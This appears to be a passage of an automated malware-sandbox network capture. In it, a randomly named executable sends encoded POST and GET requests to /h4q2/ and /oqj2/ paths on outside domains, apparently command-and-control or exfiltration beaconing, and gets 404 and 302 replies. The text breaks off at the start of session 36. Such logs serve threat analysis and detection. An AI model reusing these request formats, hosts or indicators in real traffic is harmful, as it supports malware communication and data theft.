                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 35 2b 32 70 4c 46 5a 78 36 31 53 75 63 46 51 68 30 61 78 31 42 68 6c 51 70 31 56 46 6e 67 2b 5a 71 48 4f 7a 68 57 35 62 31 35 2b 61 59 45 33 4d 39 54 6f 49 68 59 33 66 33 4a 46 68 55 4b 47 4b 67 68 63 74 73 73 33 2f 2b 77 61 64 6f 4d 57 2f 5a 49 47 45 6d 76 71 55 45 71 53 76 32 6c 49 32 7a 33 66 44 62 65 39 30 36 44 5a 70 56 56 67 4a 75 50 74 7a 6e 50 70 51 45 2f 77 41 30 64 59 77 2f 79 47 72 32 4d 4d 6a 78 50 79 66 39 4f 55 7a 53 38 4e 49 50 6c 36 4f 76 6e 78 36 39 61 31 70 77 35 4d 34 7a 34 6b 31 4a 46 57 70 43 62 32 5a 31 33 65 64 6b 38 66 32 4f 30 2f 6b 6a 4f 6d 46 57 70 62 57 37 51 58 5a 76 62 77 4e 49 70 56 51 57 55 56 46 6d 6b 68 65 45 57 69 4e 34 49 46 54 41 3d 3d
                                                                    Data Ascii: -0-L9xY=D5+2pLFZx61SucFQh0ax1BhlQp1VFng+ZqHOzhW5b15+aYE3M9ToIhY3f3JFhUKGKghctss3/+wadoMW/ZIGEmvqUEqSv2lI2z3fDbe906DZpVVgJuPtznPpQE/wA0dYw/yGr2MMjxPyf9OUzS8NIPl6Ovnx69a1pw5M4z4k1JFWpCb2Z13edk8f2O0/kjOmFWpbW7QXZvbwNIpVQWUVFmkheEWiN4IFTA==
                                                                    Jan 10, 2025 09:13:27.495505095 CET479INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:26 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.650017103.247.11.204806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:29.329629898 CET1812OUTPOST /h4q2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Origin: http://www.itcomp.store
                                                                    Referer: http://www.itcomp.store/h4q2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 44 35 2b 32 70 4c 46 5a 78 36 31 53 75 63 46 51 68 30 61 78 31 42 68 6c 51 70 31 56 46 6e 67 2b 5a 71 48 4f 7a 68 57 35 62 31 78 2b 5a 71 4d 33 44 37 62 6f 48 42 59 33 56 58 4a 45 68 55 4b 58 4b 6a 52 59 74 73 52 49 2f 38 49 61 66 4b 45 57 35 6f 49 47 52 32 76 71 52 30 71 58 79 47 6b 4b 32 7a 6e 62 44 61 79 39 30 36 44 5a 70 54 35 67 4b 37 76 74 31 6e 50 6f 47 30 2f 47 45 30 63 2f 77 2f 71 73 72 32 34 79 6a 43 58 79 65 62 75 55 78 41 6b 4e 4c 76 6c 30 4a 76 6e 70 36 39 65 2b 70 77 56 6d 34 7a 38 43 31 4a 68 57 70 47 43 33 63 30 6e 65 43 58 45 7a 68 63 73 57 39 32 4f 33 42 45 34 6c 47 5a 6c 6a 52 37 72 2b 42 64 42 31 52 6e 6c 6a 4e 6c 34 33 58 7a 61 33 50 71 6f 4d 41 4d 71 56 6e 6f 2b 36 44 6a 41 5a 45 4c 61 6d 76 4f 31 41 5a 6b 68 56 4c 34 56 6e 71 35 63 6a 56 32 33 35 6b 6a 6b 4c 49 41 52 6a 52 43 43 49 44 73 45 56 70 32 4d 6a 44 59 4d 73 49 4c 2b 31 6e 57 75 69 6e 2b 58 46 53 6c 2f 75 5a 72 6d 52 77 5a 6c 55 38 47 6a 72 5a 69 69 67 55 4f 30 43 34 6e 2b 44 57 64 71 72 70 55 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=D5+2pLFZx61SucFQh0ax1BhlQp1VFng+ZqHOzhW5b1x+ZqM3D7boHBY3VXJEhUKXKjRYtsRI/8IafKEW5oIGR2vqR0qXyGkK2znbDay906DZpT5gK7vt1nPoG0/GE0c/w/qsr24yjCXyebuUxAkNLvl0Jvnp69e+pwVm4z8C1JhWpGC3c0neCXEzhcsW92O3BE4lGZljR7r+BdB1RnljNl43Xza3PqoMAMqVno+6DjAZELamvO1AZkhVL4Vnq5cjV235kjkLIARjRCCIDsEVp2MjDYMsIL+1nWuin+XFSl/uZrmRwZlU8GjrZiigUO0C4n+DWdqrpUC4B6cOYYcbW9M1AYCjjEJ1wZlLAGTbB/CuZDQ023i6qyGh7ST9X4QI6WnsPsEygxQF2UNdPdm93+xHj7cUPH1TxIO2Rgu9HmjeGuwqMlhp+DvwYiFUqOxFIFMv8VPxe1iFFZYRu6JJfld0YAosIjjWsiyJmSbWfb4cZH+GcCDMWg6F0GSqrG/kuy4nOzsL2Yn4eM/siARSHTrRr8FFcXrmhXM1g5U8p+dfYTyZ6kiDHbCUPQ9orSdVfsEj8snhzPd71NI0/qsMxJMMjjAzGrGnPQ3sK7m8xEoxKOqb894SCGVybFyjiry5uTDqNlN5sqafcAy6EMvzFB3ipDH5u7yh7W5X4pQwwXahIMQltXLNrvITsNoDbMLhglqrdjuVvxKF1GC/WVjSuO/14B8DubYqx+xF53LpoufLfXEXAnaf7jOwbKFxavIWrLM2QexE/Dfi1JH5Fue0scFw/HEVe39smGHAHr8gH1hej1EBaYJ5kbwY6JMdNeNiNk1VrQ+825e2/U+ghetV//rwct8brNjModQEAB3SNwZ2ouKym6pN56CYgq87PjuHUtF3ZTyNnpayqgEOtoh8u8EA8Re9H9z6x8sdBzEBQ8cdAPQkhxTKOJpMgAoMPT/LuwsvsGPsZSRjjCWlnTCXkSSmBKURWpQTSpK6/F1jmfdV [TRUNCATED]
                                                                    Jan 10, 2025 09:13:30.413875103 CET479INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:28 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.650018103.247.11.204806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:31.974636078 CET519OUTGET /h4q2/?-0-L9xY=O7WWq9F6w4cGi/1xuyqA6hNbNZ9TTDUhOaeE1BmWFQlzRYYNMfDiNCsBOldRtXetUX45l8haztomC58f/ZN8Kn/la1SkzkcShgzFC6zVssbmmh1rF7ne1GqBaj3+VQkehMq71iQ=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.itcomp.store
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Jan 10, 2025 09:13:32.875283957 CET479INHTTP/1.1 404 Not Found
                                                                    Date: Fri, 10 Jan 2025 08:13:31 GMT
                                                                    Server: Apache
                                                                    Content-Length: 315
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.650019136.243.64.147806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:38.306579113 CET802OUTPOST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 69 2f 34 65 55 36 74 52 37 6f 38 77 51 34 35 30 4a 42 6e 79 47 57 6a 47 73 73 36 30 5a 6e 38 32 6e 47 53 4d 6c 65 4d 4a 72 56 4e 7a 50 75 4d 49 31 42 53 5a 4c 54 53 37 51 61 4d 30 73 70 44 34 44 61 46 32 6e 53 39 32 66 41 4a 4b 77 43 33 79 2b 51 52 73 65 2f 31 6d 59 6e 32 4e 45 74 59 50 76 58 36 4b 4c 43 4a 62 56 69 59 33 6d 45 66 4f 6a 6e 4f 50 77 52 4e 2b 79 6e 51 61 4b 61 32 52 79 5a 43 51 66 41 6b 38 79 73 4a 4f 4f 73 79 36 5a 39 74 45 6c 49 33 48 2b 32 4e 51 54 6a 64 36 6a 36 77 6d 61 50 50 31 48 4c 69 41 61 32 36 5a 2f 39 47 48 67 45 53 61 4c 41 53 64 75 62 4f 41 62 34 54 51 55 31 35 61 30 74 46
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wQ450JBnyGWjGss60Zn82nGSMleMJrVNzPuMI1BSZLTS7QaM0spD4DaF2nS92fAJKwC3y+QRse/1mYn2NEtYPvX6KLCJbViY3mEfOjnOPwRN+ynQaKa2RyZCQfAk8ysJOOsy6Z9tElI3H+2NQTjd6j6wmaPP1HLiAa26Z/9GHgESaLASdubOAb4TQU15a0tF
                                                                    Jan 10, 2025 09:13:38.849394083 CET493INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:38 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.650020136.243.64.147806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:40.856575966 CET826OUTPOST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 236
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 69 2f 34 65 55 36 74 52 37 6f 38 77 78 49 35 32 6f 42 6e 37 47 57 67 4a 4d 73 36 39 35 6e 6e 32 6e 43 53 4d 6e 79 6d 4a 39 46 4e 7a 75 2b 4d 61 67 74 53 58 72 54 53 31 77 61 4a 72 38 70 49 34 44 47 72 32 6d 75 39 32 66 45 4a 4b 30 4f 33 79 4a 38 57 75 4f 2b 54 76 34 6e 30 44 6b 74 59 50 76 58 36 4b 50 72 65 62 56 71 59 32 56 63 66 63 52 50 42 52 41 52 4d 32 53 6e 51 51 71 61 79 52 79 5a 6b 51 63 45 61 38 30 77 4a 4f 4b 67 79 37 49 39 69 4b 6c 49 78 59 4f 33 79 57 68 71 42 2b 67 66 78 34 59 50 33 73 6b 54 30 42 73 72 67 46 4d 39 6c 56 77 6b 51 61 4a 59 67 64 4f 62 6b 43 62 41 54 43 44 35 65 56 41 49 6d 4c 6f 72 44 78 55 79 79 67 4a 5a 61 43 45 6a 47 66 36 4e 77 45 51 3d 3d
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wxI52oBn7GWgJMs695nn2nCSMnymJ9FNzu+MagtSXrTS1waJr8pI4DGr2mu92fEJK0O3yJ8WuO+Tv4n0DktYPvX6KPrebVqY2VcfcRPBRARM2SnQQqayRyZkQcEa80wJOKgy7I9iKlIxYO3yWhqB+gfx4YP3skT0BsrgFM9lVwkQaJYgdObkCbATCD5eVAImLorDxUyygJZaCEjGf6NwEQ==
                                                                    Jan 10, 2025 09:13:41.488694906 CET493INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:41 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.650021136.243.64.147806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Jan 10, 2025 09:13:43.439448118 CET1839OUTPOST /oqj2/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.100millionjobs.africa
                                                                    Origin: http://www.100millionjobs.africa
                                                                    Referer: http://www.100millionjobs.africa/oqj2/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1248
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
                                                                    Data Raw: 2d 30 2d 4c 39 78 59 3d 67 69 2f 34 65 55 36 74 52 37 6f 38 77 78 49 35 32 6f 42 6e 37 47 57 67 4a 4d 73 36 39 35 6e 6e 32 6e 43 53 4d 6e 79 6d 4a 39 4e 4e 7a 2b 69 4d 49 58 35 53 55 72 54 53 39 51 61 49 72 38 70 56 34 44 65 76 32 6d 69 44 32 5a 59 4a 4d 58 47 33 77 38 49 57 6e 4f 2b 54 74 34 6e 70 4e 45 73 61 50 72 7a 6d 4b 4c 48 65 62 56 71 59 32 53 6b 66 65 44 6e 42 54 41 52 4e 2b 79 6e 45 61 4b 61 65 52 79 42 61 51 66 70 76 39 43 41 4a 41 4f 4d 79 32 61 46 69 43 6c 49 7a 62 4f 33 71 57 68 32 6f 2b 67 7a 58 34 5a 72 64 73 6d 50 30 4d 5a 61 76 65 65 39 73 58 68 55 50 47 34 59 59 65 65 72 61 44 4a 63 79 43 41 49 6a 61 68 55 6b 4f 2b 33 41 37 46 65 31 69 6f 4a 46 64 68 4b 54 53 71 63 42 47 4b 54 68 5a 54 34 73 78 2b 49 45 75 57 6f 75 54 57 41 4d 66 62 4a 51 62 52 76 6c 44 57 72 36 44 55 62 31 7a 71 54 74 65 61 32 63 77 70 47 39 68 7a 45 32 49 7a 6f 67 39 71 2f 68 2b 78 42 62 46 70 6e 73 4c 44 42 76 63 52 64 6c 76 73 42 47 47 31 2f 30 45 35 55 76 63 41 34 75 53 5a 54 54 53 37 39 73 70 35 4e 53 32 64 [TRUNCATED]
                                                                    Data Ascii: -0-L9xY=gi/4eU6tR7o8wxI52oBn7GWgJMs695nn2nCSMnymJ9NNz+iMIX5SUrTS9QaIr8pV4Dev2miD2ZYJMXG3w8IWnO+Tt4npNEsaPrzmKLHebVqY2SkfeDnBTARN+ynEaKaeRyBaQfpv9CAJAOMy2aFiClIzbO3qWh2o+gzX4ZrdsmP0MZavee9sXhUPG4YYeeraDJcyCAIjahUkO+3A7Fe1ioJFdhKTSqcBGKThZT4sx+IEuWouTWAMfbJQbRvlDWr6DUb1zqTtea2cwpG9hzE2Izog9q/h+xBbFpnsLDBvcRdlvsBGG1/0E5UvcA4uSZTTS79sp5NS2dTTPiBU4kpq198eBUcTljFIkXNAIBQPbjZV3IpteyPTVzknJS+fAppp9Ws/cP4Ipx4vQVOoFiMbo1mnR7M0kOyZuOFffKQCJte4mk5GDdQNFkKUXOBulko4c7g7ZcCN2ouR3OqzRKiW9ifNhIbvEBr9mKidcn9glVzSVCTbBj+GiMwEs7YV6sT3mwygKr4FNmkEsv4X/cA7RbNkFcayAEnekefpZrcOt2yMakAoGAW1Ui/K2DuRISSSEVNnmKhRKLXjuJdZrGZgL34dtF64IpUwufhlN+buc+3w49vk45kHEOcxUaY/m/Xt+hd2uRYXUMzFoAdi6knTnYf9AZ3f3/88ri71MTK5hl0n6jo01TmhtE+xOgitScJPniZ5Cemg9rKLyemAiq2GFTnEkLtHDssSumEx1tXkDfNfLazcfDO/+D9xhsDYUGt8bu9YmX+KyvD7J0Vo4BF46SuqBzYwoHbm2bTX49iyGo1LzZDDZ1jXnr22/scGyVePVGo/KqKY+s/zdrKcPdLhJfTjNHft0fGzmGlKvWtO+OxEaxSv7bwoiAxQgSYgVbxjLgM+O9bQAGUPDdpZyfxmDwd/p5Qdw3bdPWmY3hsIFpQwvpSiJQyWiNeOlmHIBxesgcoNRbV3pzWSISA/prTBTRwsdAlA3M/IOYpvtd4nwdYj [TRUNCATED]
                                                                    Jan 10, 2025 09:13:44.061045885 CET493INHTTP/1.1 302 Found
                                                                    Date: Fri, 10 Jan 2025 08:13:43 GMT
                                                                    Server: Apache
                                                                    Location: http://maximumgroup.co.za/oqj2/
                                                                    Content-Length: 290
                                                                    Connection: close
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 6f 71 6a 32 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/oqj2/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.650022136.243.64.147806728C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
                                                                    TimestampBytes transferredDirectionData
